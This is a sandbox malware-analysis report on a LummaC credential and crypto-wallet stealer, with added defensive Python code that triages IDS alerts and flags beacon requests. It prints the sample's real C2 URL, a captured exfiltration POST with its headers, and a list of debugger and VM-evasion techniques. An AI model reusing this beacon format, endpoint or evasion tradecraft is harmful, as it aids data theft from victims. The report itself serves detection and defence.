
Windows Analysis Report
I2BJhmJou4.exe

Overview

General Information

Sample name: I2BJhmJou4.exe (renamed because the original name is a hash value)
Original sample name: 16f4ab4f0ba6ebd746bcc6b032346ffb80f88814e78e103739af0e5569fee962.exe
Analysis ID: 1555044
MD5: c847cb3090530ec9ae2e82805a03360d
SHA1: a7f075ba37961545ae0a819bda5d2be28618d60d
SHA256: 16f4ab4f0ba6ebd746bcc6b032346ffb80f88814e78e103739af0e5569fee962
Tags: 94-158-244-69, exe, user-JAMESWT_MHT

Detection

LummaC Stealer
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to hide a thread from the debugger
Delayed program exit found
Found API chain indicative of debugger detection
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for sample
Query firmware table information (likely to detect VMs)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Enables driver privileges
Found evasive API chain (date check)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
One or more processes crash
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • I2BJhmJou4.exe (PID: 7500 cmdline: "C:\Users\user\Desktop\I2BJhmJou4.exe" MD5: C847CB3090530EC9AE2E82805A03360D)
    • WerFault.exe (PID: 3712 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7500 -s 1708 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
Malware configuration (LummaC): {"C2 url": "http://94.158.244.69/c2sock", "Build Version": "LummaC2, Build 20233101"}

Yara matches on PCAP:
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_LummaCStealer_1 | Yara detected LummaC Stealer | Joe Security |
dump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |

Yara matches on memory dumps:
Source | Rule | Description | Author | Strings
00000000.00000002.3246383027.0000000002F69000.00000040.00000020.00020000.00000000.sdmp | Windows_Trojan_RedLineStealer_ed346e4c | unknown | unknown | 0xf00:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.3246211626.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_LummaCStealer | Yara detected LummaC Stealer | Joe Security |
00000000.00000002.3246211626.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Smokeloader_3687686f | unknown | unknown | 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_LummaCStealer | Yara detected LummaC Stealer | Joe Security |
00000000.00000003.1423642848.00000000049F0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_LummaCStealer | Yara detected LummaC Stealer | Joe Security |
(3 further memory-dump entries are collapsed in the original report)

Yara matches on unpacked PE files:
Source | Rule | Description | Author | Strings
0.2.I2BJhmJou4.exe.400000.0.unpack | JoeSecurity_LummaCStealer | Yara detected LummaC Stealer | Joe Security |
0.2.I2BJhmJou4.exe.400000.0.raw.unpack | JoeSecurity_LummaCStealer | Yara detected LummaC Stealer | Joe Security |
0.3.I2BJhmJou4.exe.49f0000.0.raw.unpack | JoeSecurity_LummaCStealer | Yara detected LummaC Stealer | Joe Security |
                  No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-13T10:54:22.079039+0100 | 2022930 | 1 | A Network Trojan was detected | 4.245.163.56 | 443 | 192.168.2.8 | 49706 | TCP
2024-11-13T10:54:59.967146+0100 | 2022930 | 1 | A Network Trojan was detected | 4.245.163.56 | 443 | 192.168.2.8 | 49711 | TCP
2024-11-13T10:53:30.089830+0100 | 2043206 | 1 | A Network Trojan was detected | 192.168.2.8 | 49713 | 94.158.244.69 | 80 | TCP
2024-11-13T10:53:30.089830+0100 | 2043206 | 1 | A Network Trojan was detected | 192.168.2.8 | 49708 | 94.158.244.69 | 80 | TCP
2024-11-13T10:54:34.362378+0100 | 2043206 | 1 | A Network Trojan was detected | 192.168.2.8 | 49707 | 94.158.244.69 | 80 | TCP
2024-11-13T10:54:53.135143+0100 | 2043206 | 1 | A Network Trojan was detected | 192.168.2.8 | 49709 | 94.158.244.69 | 80 | TCP
2024-11-13T10:55:02.213728+0100 | 2043206 | 1 | A Network Trojan was detected | 192.168.2.8 | 49710 | 94.158.244.69 | 80 | TCP
2024-11-13T10:55:10.989197+0100 | 2043206 | 1 | A Network Trojan was detected | 192.168.2.8 | 49712 | 94.158.244.69 | 80 | TCP
2024-11-13T10:55:29.613117+0100 | 2043206 | 1 | A Network Trojan was detected | 192.168.2.8 | 49714 | 94.158.244.69 | 80 | TCP
2024-11-13T10:55:30.349548+0100 | 2043206 | 1 | A Network Trojan was detected | 192.168.2.8 | 49715 | 94.158.244.69 | 80 | TCP
2024-11-13T10:55:48.326883+0100 | 2043206 | 1 | A Network Trojan was detected | 192.168.2.8 | 49716 | 94.158.244.69 | 80 | TCP
2024-11-13T10:55:57.094150+0100 | 2043206 | 1 | A Network Trojan was detected | 192.168.2.8 | 49717 | 94.158.244.69 | 80 | TCP
2024-11-13T10:56:06.203781+0100 | 2043206 | 1 | A Network Trojan was detected | 192.168.2.8 | 49718 | 94.158.244.69 | 80 | TCP
2024-11-13T10:56:15.057549+0100 | 2043206 | 1 | A Network Trojan was detected | 192.168.2.8 | 49719 | 94.158.244.69 | 80 | TCP
2024-11-13T10:56:23.838414+0100 | 2043206 | 1 | A Network Trojan was detected | 192.168.2.8 | 49720 | 94.158.244.69 | 80 | TCP
2024-11-13T10:56:32.618908+0100 | 2043206 | 1 | A Network Trojan was detected | 192.168.2.8 | 49721 | 94.158.244.69 | 80 | TCP
2024-11-13T10:55:30.349548+0100 | 2843864 | 1 | A Network Trojan was detected | 192.168.2.8 | 49715 | 94.158.244.69 | 80 | TCP
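The alert tables above mix three signatures, and not all of them say the same thing. The 2043206 and 2843864 hits are outbound from the sandbox host to 94.158.244.69:80, the host and port of the C2 URL in the extracted configuration, and 2843864 fires on the same connection (client port 49715, same timestamp) as one of the 2043206 hits. The two 2022930 hits are inbound from 4.245.163.56:443, i.e. an exploit signature for CAB parsing matching inside a TLS stream that is unrelated to the configured C2; that cannot be confirmed from encrypted payload and should be treated as unverified rather than counted as sample behaviour. The triage below is an added example, not part of the Joe Sandbox report; the alert rows are copied from the tables above and the sandbox address and C2 endpoint are taken from the report.

```python
"""Triage the Suricata alert rows from this report: group by SID, work out
direction relative to the sandbox host, and cross-check each peer against
the C2 extracted from the sample's configuration."""
from collections import defaultdict

SANDBOX_HOST = "192.168.2.8"        # analysis VM address, from the report
CONFIG_C2 = ("94.158.244.69", 80)   # host/port of the C2 URL in the extracted config

# (timestamp, sid, src_ip, src_port, dst_ip, dst_port), copied from the
# report's alert tables; severity (1), classtype and proto (TCP) are the
# same for every row and omitted.
ALERTS = [
    ("2024-11-13T10:54:22.079039+0100", 2022930, "4.245.163.56", 443, "192.168.2.8", 49706),
    ("2024-11-13T10:54:59.967146+0100", 2022930, "4.245.163.56", 443, "192.168.2.8", 49711),
    ("2024-11-13T10:53:30.089830+0100", 2043206, "192.168.2.8", 49713, "94.158.244.69", 80),
    ("2024-11-13T10:53:30.089830+0100", 2043206, "192.168.2.8", 49708, "94.158.244.69", 80),
    ("2024-11-13T10:54:34.362378+0100", 2043206, "192.168.2.8", 49707, "94.158.244.69", 80),
    ("2024-11-13T10:54:53.135143+0100", 2043206, "192.168.2.8", 49709, "94.158.244.69", 80),
    ("2024-11-13T10:55:02.213728+0100", 2043206, "192.168.2.8", 49710, "94.158.244.69", 80),
    ("2024-11-13T10:55:10.989197+0100", 2043206, "192.168.2.8", 49712, "94.158.244.69", 80),
    ("2024-11-13T10:55:29.613117+0100", 2043206, "192.168.2.8", 49714, "94.158.244.69", 80),
    ("2024-11-13T10:55:30.349548+0100", 2043206, "192.168.2.8", 49715, "94.158.244.69", 80),
    ("2024-11-13T10:55:48.326883+0100", 2043206, "192.168.2.8", 49716, "94.158.244.69", 80),
    ("2024-11-13T10:55:57.094150+0100", 2043206, "192.168.2.8", 49717, "94.158.244.69", 80),
    ("2024-11-13T10:56:06.203781+0100", 2043206, "192.168.2.8", 49718, "94.158.244.69", 80),
    ("2024-11-13T10:56:15.057549+0100", 2043206, "192.168.2.8", 49719, "94.158.244.69", 80),
    ("2024-11-13T10:56:23.838414+0100", 2043206, "192.168.2.8", 49720, "94.158.244.69", 80),
    ("2024-11-13T10:56:32.618908+0100", 2043206, "192.168.2.8", 49721, "94.158.244.69", 80),
    ("2024-11-13T10:55:30.349548+0100", 2843864, "192.168.2.8", 49715, "94.158.244.69", 80),
]


def direction(row):
    """Direction of the flow as seen from the sandbox host."""
    _, _, src, _, dst, _ = row
    if src == SANDBOX_HOST:
        return "outbound"
    if dst == SANDBOX_HOST:
        return "inbound"
    return "transit"


def remote_peer(row):
    """(ip, port) of the non-sandbox side of the flow."""
    _, _, src, sport, dst, dport = row
    return (dst, dport) if src == SANDBOX_HOST else (src, sport)


def triage(alerts):
    """Per SID: hit count, direction, remote peers, whether a peer is the
    configured C2, and whether the hits are inbound TLS (unverifiable)."""
    by_sid = defaultdict(list)
    for row in alerts:
        by_sid[row[1]].append(row)
    summary = {}
    for sid, rows in by_sid.items():
        peers = {remote_peer(r) for r in rows}
        dirs = {direction(r) for r in rows}
        summary[sid] = {
            "count": len(rows),
            "direction": dirs.pop() if len(dirs) == 1 else "mixed",
            "peers": peers,
            "matches_config_c2": CONFIG_C2 in peers,
            # an exploit signature matching inbound data from TCP/443 is
            # matching inside a TLS stream; it cannot be confirmed from the pcap
            "unverified": all(direction(r) == "inbound" and r[3] == 443 for r in rows),
        }
    return summary


def shared_flows(alerts, sid_a, sid_b):
    """Flows (src, sport, dst, dport) on which both SIDs fired; a second
    rule on the same connection corroborates the first."""
    def flows(sid):
        return {r[2:] for r in alerts if r[1] == sid}
    return flows(sid_a) & flows(sid_b)


if __name__ == "__main__":
    for sid, info in sorted(triage(ALERTS).items()):
        print(sid, info)
    print("corroborated flows:", shared_flows(ALERTS, 2043206, 2843864))
```

Run against the rows above, 2043206 resolves to 14 separate outbound connections to the configured C2, 2843864 corroborates one of them on the same flow, and 2022930 is flagged as unverified inbound TLS with no relation to the C2.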


                  AV Detection

Source: 00000000.00000002.3249213075.00000000056E5000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: LummaC {"C2 url": "http://94.158.244.69/c2sock", "Build Version": "LummaC2, Build 20233101"}
Source: I2BJhmJou4.exe | ReversingLabs: Detection: 84%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: I2BJhmJou4.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\I2BJhmJou4.exe | Code function: 0_2_004052D9 CryptUnprotectData

                  Compliance

Source: C:\Users\user\Desktop\I2BJhmJou4.exe | Unpacked PE file: 0.2.I2BJhmJou4.exe.400000.0.unpack
Source: I2BJhmJou4.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\I2BJhmJou4.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: C:\Users\user\Desktop\I2BJhmJou4.exe | Code function: 0_2_00451F08 FindFirstFileExW
Source: C:\Users\user\Desktop\I2BJhmJou4.exe | Code function: 0_2_00451FBC FindFirstFileExW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\I2BJhmJou4.exe | Code function: 0_2_02F22223 FindFirstFileExW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\I2BJhmJou4.exe | Code function: 0_2_02F2216F FindFirstFileExW

                  Networking

Source: Network traffic | Suricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.8:49710 -> 94.158.244.69:80
Source: Network traffic | Suricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.8:49716 -> 94.158.244.69:80
Source: Network traffic | Suricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.8:49721 -> 94.158.244.69:80
Source: Network traffic | Suricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.8:49714 -> 94.158.244.69:80
Source: Network traffic | Suricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.8:49712 -> 94.158.244.69:80
Source: Network traffic | Suricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.8:49718 -> 94.158.244.69:80
Source: Network traffic | Suricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.8:49717 -> 94.158.244.69:80
Source: Network traffic | Suricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.8:49719 -> 94.158.244.69:80
Source: Network traffic | Suricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.8:49709 -> 94.158.244.69:80
Source: Network traffic | Suricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.8:49720 -> 94.158.244.69:80
Source: Network traffic | Suricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.8:49707 -> 94.158.244.69:80
Source: Network traffic | Suricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.8:49715 -> 94.158.244.69:80
Source: Network traffic | Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.8:49715 -> 94.158.244.69:80
Source: Network traffic | Suricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.8:49713 -> 94.158.244.69:80
Source: Network traffic | Suricata IDS: 2043206 - Severity 1 - ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 : 192.168.2.8:49708 -> 94.158.244.69:80
Source: Malware configuration extractor | URLs: http://94.158.244.69/c2sock
Source: Joe Sandbox View | IP Address: 94.158.244.69
Source: Joe Sandbox View | ASN Name: MIVOCLOUDMD
Source: Network traffic | Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.8:49711
Source: Network traffic | Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.8:49706
Source: unknown | TCP traffic detected without corresponding DNS query: 94.158.244.69 (50 connections; the C2 address is hard-coded in the configuration, so no name is ever resolved)
Source: unknown | HTTP traffic detected:
    POST /c2sock HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
    User-Agent: TeslaBrowser/5.5
    Content-Length: 16465
    Host: 94.158.244.69
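The captured request carries every network-side trait that the signatures above key on: a POST to the path from the extracted C2 URL, a Host header that is a bare IP (matching the "TCP traffic without corresponding DNS query" observations), the User-Agent "TeslaBrowser/5.5", and a multipart/form-data body that is the exfiltration container. The classifier below is an added example, not part of the report; it reads the C2 from the configuration JSON shown in the report and scores a raw request against those traits. The observed request is copied from the report (its body is not in the extract and is left empty); the benign comparison request is constructed.

```python
"""Score a raw HTTP request against the LummaC2 beacon traits visible in
this report, using the extracted configuration as the source of truth."""
import json
from ipaddress import ip_address
from urllib.parse import urlsplit

# Extracted configuration, copied verbatim from the report.
LUMMA_CONFIG = json.loads(
    '{"C2 url": "http://94.158.244.69/c2sock", "Build Version": "LummaC2, Build 20233101"}'
)

# Request observed in the report; the multipart body is not reproduced
# there, so only the header block is included.
OBSERVED = (
    "POST /c2sock HTTP/1.1\r\n"
    "Connection: Keep-Alive\r\n"
    "Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74\r\n"
    "User-Agent: TeslaBrowser/5.5\r\n"
    "Content-Length: 16465\r\n"
    "Host: 94.158.244.69\r\n\r\n"
)

# Constructed benign upload, for comparison.
BENIGN = (
    "POST /upload HTTP/1.1\r\n"
    "Host: files.example.org\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)\r\n"
    "Content-Type: multipart/form-data; boundary=abc\r\n"
    "Content-Length: 10\r\n\r\n"
)


def parse_request(raw):
    """Split request line and headers; header names are folded to lower case."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, target, _ = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers


def is_ip_literal(host):
    """True when the Host header is an address rather than a name
    (bracketed IPv6 literals are not handled here)."""
    try:
        ip_address(host.split(":")[0])
        return True
    except ValueError:
        return False


def classify(raw, config=LUMMA_CONFIG):
    """Return the list of matched traits, in a fixed order. Each trait on its
    own is weak (multipart POSTs and IP-literal hosts are common), so the
    decision is made on the combination in is_lumma_beacon()."""
    method, target, headers = parse_request(raw)
    c2 = urlsplit(config["C2 url"])
    reasons = []
    if method == "POST" and target == c2.path:
        reasons.append("post-to-config-c2-path")
    if headers.get("host") == c2.hostname:
        reasons.append("host-is-config-c2")
    if is_ip_literal(headers.get("host", "")):
        reasons.append("ip-literal-host")
    if headers.get("user-agent", "").startswith("TeslaBrowser/"):
        reasons.append("teslabrowser-user-agent")
    if headers.get("content-type", "").startswith("multipart/form-data"):
        reasons.append("multipart-body")
    return reasons


def is_lumma_beacon(raw, config=LUMMA_CONFIG):
    """Match on the config-derived traits (path and host from the extracted
    C2 URL) or on the static TeslaBrowser User-Agent; never on the generic
    traits alone."""
    r = set(classify(raw, config))
    return {"post-to-config-c2-path", "host-is-config-c2"} <= r or "teslabrowser-user-agent" in r


if __name__ == "__main__":
    for name, req in (("observed", OBSERVED), ("benign", BENIGN)):
        print(name, is_lumma_beacon(req), classify(req))
```

Keying the decision on the configuration-derived path and host means the same function can be re-pointed at the next build's C2 without rewriting it, while the User-Agent check catches the beacon even when the operator rotates infrastructure.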
Source: I2BJhmJou4.exe, 00000000.00000002.3249213075.00000000055E0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://94.158.244.69/
Source: I2BJhmJou4.exe, 00000000.00000002.3249213075.00000000055E0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://94.158.244.69/%OB
Source: I2BJhmJou4.exe, 00000000.00000002.3249213075.00000000055E0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://94.158.244.69/KH0
Source: I2BJhmJou4.exe, 00000000.00000002.3251368757.0000000005CAF000.00000004.00000020.00020000.00000000.sdmp, I2BJhmJou4.exe, 00000000.00000002.3249213075.00000000056E5000.00000004.00000020.00020000.00000000.sdmp, I2BJhmJou4.exe, 00000000.00000002.3249213075.00000000055E0000.00000004.00000020.00020000.00000000.sdmp, I2BJhmJou4.exe, 00000000.00000002.3251368757.0000000005CB8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://94.158.244.69/c2sock
Source: I2BJhmJou4.exe, 00000000.00000002.3249213075.00000000056E5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://94.158.244.69/c2sockab?
Source: I2BJhmJou4.exe, 00000000.00000002.3249213075.00000000056E5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://94.158.244.69/c2socklb:
Source: I2BJhmJou4.exe, 00000000.00000002.3246415805.0000000002FE0000.00000004.00000020.00020000.00000000.sdmp, I2BJhmJou4.exe, 00000000.00000002.3249213075.00000000056E5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://94.158.244.69/c2socks
Source: I2BJhmJou4.exe, 00000000.00000002.3249213075.00000000055E0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://94.158.244.69/oH
Source: I2BJhmJou4.exe, 00000000.00000002.3249213075.00000000055E0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://94.158.244.69/yH
Source: I2BJhmJou4.exe, 00000000.00000002.3251368757.0000000005D14000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: I2BJhmJou4.exe, 00000000.00000002.3251368757.0000000005D14000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: I2BJhmJou4.exe, 00000000.00000002.3251368757.0000000005D14000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: I2BJhmJou4.exe, 00000000.00000002.3251368757.0000000005D14000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: I2BJhmJou4.exe, 00000000.00000002.3251368757.0000000005D14000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: I2BJhmJou4.exe, 00000000.00000002.3251368757.0000000005D14000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: I2BJhmJou4.exe, 00000000.00000002.3251368757.0000000005D14000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: I2BJhmJou4.exe, 00000000.00000002.3251368757.0000000005D14000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: I2BJhmJou4.exe, 00000000.00000002.3251368757.0000000005D14000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: Amcache.hve.8.dr | String found in binary or memory: http://upx.sf.net
Source: I2BJhmJou4.exe, 00000000.00000002.3251368757.0000000005D14000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/0
Source: I2BJhmJou4.exe, 00000000.00000002.3251368757.0000000005D14000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://x1.i.lencr.org/0
Source: I2BJhmJou4.exe, 00000000.00000003.1913354234.0000000005050000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: I2BJhmJou4.exe, 00000000.00000003.1913354234.0000000005050000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: I2BJhmJou4.exe, 00000000.00000003.1913354234.0000000005050000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: I2BJhmJou4.exe, 00000000.00000003.1913354234.0000000005050000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: I2BJhmJou4.exe, 00000000.00000003.1913354234.0000000005050000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: I2BJhmJou4.exe, 00000000.00000003.1913354234.0000000005050000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: I2BJhmJou4.exe, 00000000.00000003.1913354234.0000000005050000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: I2BJhmJou4.exe, 00000000.00000002.3252254739.0000000006403000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: I2BJhmJou4.exe, 00000000.00000002.3252254739.0000000006403000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: I2BJhmJou4.exe, 00000000.00000003.1913354234.0000000005050000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
Source: I2BJhmJou4.exe, 00000000.00000003.1913354234.0000000005050000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: I2BJhmJou4.exe, 00000000.00000002.3252254739.0000000006403000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
Source: I2BJhmJou4.exe, 00000000.00000002.3252254739.0000000006403000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
Source: I2BJhmJou4.exe, 00000000.00000002.3252254739.0000000006403000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: I2BJhmJou4.exe, 00000000.00000002.3252254739.0000000006403000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

                  System Summary

Source: 00000000.00000002.3246383027.0000000002F69000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.3246211626.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: C:\Users\user\Desktop\I2BJhmJou4.exe | Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\I2BJhmJou4.exe | Code function: 0_2_0040B81C lstrcatW,lstrcmpW,lstrcmpW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,lstrcmpW,lstrlenW,lstrcatW,lstrcatW,lstrcatW,NtCreateFile,lstrcatW,NtQueryDirectoryFile,lstrcmpW,NtClose,lstrcmpW,lstrlenW,lstrlenW,lstrcmpW
Source: C:\Users\user\Desktop\I2BJhmJou4.exe | Code function: 0_2_00422177 NtQueryInformationProcess
Source: C:\Users\user\Desktop\I2BJhmJou4.exe | Code function: 0_2_0040A928 lstrcmpW,lstrlenW,lstrcatW,NtCreateFile,lstrcatW,lstrlenW
Source: C:\Users\user\Desktop\I2BJhmJou4.exe | Code function: 0_2_0040B129 lstrcatW,lstrcatW,NtReadFile,NtClose
Source: C:\Users\user\Desktop\I2BJhmJou4.exe | Code function: 0_2_0042F1C2 NtClose
Source: C:\Users\user\Desktop\I2BJhmJou4.exe | Code function: 0_2_0041F9A4 GetCurrentProcessId,NtDuplicateObject,NtClose,GetProcessId,NtQuerySystemInformation,NtQuerySystemInformation
Source: C:\Users\user\Desktop\I2BJhmJou4.exe | Code function: 0_2_004244E4 NtSetInformationThread
Source: C:\Users\user\Desktop\I2BJhmJou4.exe | Code function: 0_2_004224A3 NtQueryInformationProcess
Source: C:\Users\user\Desktop\I2BJhmJou4.exe | Code function: 0_2_004245EC NtQuerySystemInformation
Source: C:\Users\user\Desktop\I2BJhmJou4.exe | Code function: 0_2_00421EEB NtQueryInformationProcess
Source: C:\Users\user\Desktop\I2BJhmJou4.exe | Code function: 0_2_0040B7BB lstrcmpW,NtClose
Source: C:\Users\user\Desktop\I2BJhmJou4.exe | Code function: 0_2_0040B7F5 NtClose
